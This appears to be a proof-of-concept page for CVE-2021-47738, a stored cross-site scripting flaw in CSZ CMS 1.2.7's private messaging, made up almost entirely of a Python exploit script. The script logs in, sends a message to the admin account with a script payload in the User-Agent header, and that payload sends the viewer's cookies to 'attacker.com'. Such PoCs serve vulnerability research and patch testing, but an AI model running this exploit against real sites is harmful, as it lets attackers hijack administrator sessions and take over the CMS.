CVE-2021-47738 CSZ CMS 1.2.7 私信功能存储型XSS漏洞

# CVE-2021-47738 PoC - CSZ CMS Stored XSS via Private Messaging # This PoC demonstrates how to inject malicious JavaScript through User-Agent header import requests import json target_url = "http://target-server/cszcms" login_url = f"{target_url}/login" message_url = f"{target_url}/message/send" # Step 1: Login to CSZ CMS session = requests.Session() login_data = { "username": "attacker_user", "password": "attacker_password" } session.post(login_url, data=login_data) # Step 2: Send private message with XSS payload in User-Agent header xss_payload = "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>" headers = { "User-Agent": xss_payload } message_data = { "to_user": "admin", "subject": "Test Message", "message": "Please check this message." } response = session.post(message_url, data=message_data, headers=headers) # Step 3: When admin views the message, XSS will be executed print("XSS payload sent successfully via User-Agent header") print("Payload:", xss_payload) print("Wait for admin to view message in backend dashboard")